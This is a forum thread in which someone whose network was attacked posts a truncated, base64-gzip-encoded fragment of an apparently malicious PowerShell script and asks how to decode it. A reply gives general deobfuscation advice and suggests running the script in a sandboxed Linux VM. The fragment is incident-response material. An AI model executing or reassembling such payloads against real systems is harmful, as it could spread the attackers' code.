Help needed to decrypt PS1 file

Can some one help me solve this puzzle?

We were under attack and were able to find some IP addresses that where used to connect to. Scanning does IP’s revieled some powershell scripts.
I need to figure out a way to decode what is in the powershell scripts

below is very small part of the code can you help me decode it?

“fa='H4sIAAAAAAAEAOw9WXuiStM/aC4OuMyMl6KCqJAAAspd1AQRXM5oovjrv6pu9k3MZJb3fDnn8ZmI0HRX117VVV3x1Oq2Hoe9gSPL3G7f6cJ//ebc/tL9suK6nYb4aD/ulJEmHqUH3T58eX6z3xinJUw2+zXeO
3BG6gsnbqaKqom7qyaeFr2B3W7upk1tz+jSt+9fpo+bh6+CCzf3JkpXFu3mufelyzFN15GnKidLS07aKI0DDmeYe87QeUUTH4/i5J/BjPNOX/s6/ALv0BllOh2O3q6qcB3/sx/R9/cvgx5/HmobeDcvilxLsHmmpzs
jnJvS3fxw+fVi5nW4mcu/”

I have looked at rot13, rot47
Can you assist me in this

Thanks in advance

@jvlavl said:

Can some one help me solve this puzzle?

We were under attack and were able to find some IP addresses that where used to connect to. Scanning does IP’s revieled some powershell scripts.
I need to figure out a way to decode what is in the powershell scripts

Generally powershell scripts are a mix of Base64 and Zip, but this should only be seen as a starting point.

Often you need to read through the code to see exactly what it is doing because people do use some imaginative obfuscation techniques.

Its nearly impossible to decode a random extract though as this looks like a variable assignment. That means the script could be adding it to something, using part of it, reversing it etc.

With powershell it helps if you run it in a Linux VM (pwsh) so it is less likely to cause system damage and insert Write-Host statements after each “function” takes place.